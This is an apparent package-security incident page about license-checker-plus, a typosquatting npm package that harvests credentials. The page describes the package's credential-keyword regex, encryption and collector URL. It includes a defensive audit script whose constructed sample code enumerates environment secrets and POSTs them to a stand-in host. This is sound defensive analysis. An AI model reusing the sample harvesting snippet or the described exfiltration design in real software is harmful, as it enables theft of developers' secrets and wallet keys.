Incident detail

critical · npm · typosquatting · osv

Malicious code in license-checker-plus (npm)

license-checker-plus

Risk score

92

AI summary

Indexed incident for license-checker-plus (npm).

Description


Source: amazon-inspector (66ac93280c5fc72f65d15486a69369e4d2c2b289fa6f062a6643b63137fc6aa9)

Package name mimics the widely used license-checker while shipping an undocumented lib/compliance.js module that harvests credentials. The module scans process.env for keys matching /KEY|PRIVATE|MNEMONIC|DEPLOYER|SECRET|TOKEN|PASSWORD|CREDENTIAL|AWS_/i, encrypts the collected entries with AES-256-GCM using a key derived from sha256('lc:' + COMPLIANCE_SERVICE), and POSTs the ciphertext (carried via an X-Project-Id header and JSON body) to https://licenses.rpc-health-monitor.xyz/v1/compliance (lib/compliance.js:7, 32-33, 39, 101). The MNEMONIC/DEPLOYER keywords indicate crypto-wallet credential targeting. Repository metadata is inconsistent: bugs.url still references the legitimate davglass/license-checker repo while the package is published from a freshly created GitHub account, and the README is copied from the original with no mention of a 'compliance' feature. The encrypt-before-send design is intended to evade network inspection. While the exfiltration call is not yet reached from the documented entry point in this version, the harvester is fully wired (key derivation, encryption, POST channel) and the package is a clear typosquat lure: installer harm is the package's purpose.
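As an added defensive example (not tooling from ThreatPkg, Amazon Inspector or the package itself), the following Node.js script turns the traits described above into audit heuristics over a package.json object and a module's source text; the publisher account, collector host and sample module it uses are constructed placeholders, and the short "well-known package" allowlist is an assumption.

```javascript
// Heuristic audit of an installed npm package for the traits described in the
// incident: a name riding on a popular package, bugs.url pointing at a different
// repo than repository.url, enumeration of process.env filtered by a
// credential-keyword regex, local symmetric encryption, and outbound calls to
// hosts outside an allowlist. Example code, not the advisory's or package's own.
const KNOWN_POPULAR = ["license-checker"]; // assumption: local allowlist of names to guard
const CRED_WORDS = /KEY|PRIVATE|MNEMONIC|DEPLOYER|SECRET|TOKEN|PASSWORD|CREDENTIAL|AWS_/i;
const ENV_ENUM = /Object\.(keys|entries)\(\s*process\.env\s*\)|\bin\s+process\.env\b/;
const REGEX_LITERAL = /\/((?:[^/\\\n]|\\.)+)\/[gimsuy]*/g; // crude regex-literal finder
const URL_HOST = /https?:\/\/([a-z0-9.-]+)/gi;

// Normalise a GitHub URL to "owner/repo" (lower-case), or null if it is not one.
function repoFromUrl(u) {
  const m = /github\.com\/([^/]+)\/([^/.#]+)/i.exec(u || "");
  return m ? `${m[1]}/${m[2]}`.toLowerCase() : null;
}

function auditPackage(pkg, src, trustedHosts = ["registry.npmjs.org"]) {
  const findings = [];
  const base = KNOWN_POPULAR.find((k) => pkg.name !== k && pkg.name.startsWith(k));
  if (base) findings.push(`name: "${pkg.name}" extends well-known package "${base}"`);
  const repo = repoFromUrl(pkg.repository && pkg.repository.url);
  const bugs = repoFromUrl(pkg.bugs && pkg.bugs.url);
  if (repo && bugs && repo !== bugs) findings.push(`metadata: bugs.url (${bugs}) != repository (${repo})`);
  // Only flag env enumeration when a regex literal in the file names credential keywords.
  const credFilter = [...src.matchAll(REGEX_LITERAL)].some((m) => CRED_WORDS.test(m[1]));
  if (ENV_ENUM.test(src) && credFilter) findings.push("code: enumerates process.env with a credential-keyword filter");
  if (/createCipheriv\(/.test(src)) findings.push("code: encrypts data locally (createCipheriv)");
  for (const m of src.matchAll(URL_HOST)) {
    const host = m[1].toLowerCase();
    if (!trustedHosts.includes(host)) findings.push(`network: outbound call to untrusted host ${host}`);
  }
  return { findings, suspicious: findings.length >= 3 };
}

// Constructed sample inputs: not the real package.json or lib/compliance.js.
const SAMPLE_PKG = {
  name: "license-checker-plus",
  repository: { url: "git+https://github.com/new-account-0000/license-checker-plus.git" },
  bugs: { url: "https://github.com/davglass/license-checker/issues" },
};
const SAMPLE_SRC = `
const crypto = require('crypto'), https = require('https');
const picked = Object.entries(process.env).filter(([k]) => /KEY|SECRET|TOKEN/i.test(k));
const c = crypto.createCipheriv('aes-256-gcm', crypto.randomBytes(32), crypto.randomBytes(12));
https.request('https://collector.example.invalid/v1/compliance', { method: 'POST' }).end();
`;
console.log(JSON.stringify(auditPackage(SAMPLE_PKG, SAMPLE_SRC), null, 2));
```

Run it against the unpacked contents of a suspect package (package.json plus each .js file) rather than the sample; a real audit should also compare the published tarball against the upstream repository, since a copied README hides the extra module.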

Source: ghsa-malware (b45e61e83915331b1d95eed997d2c039f6627838f639bbdde6b71ef4989da9a8)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Technical details


Indicators

  • alias: GHSA-73xx-w222-rg6v (90%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
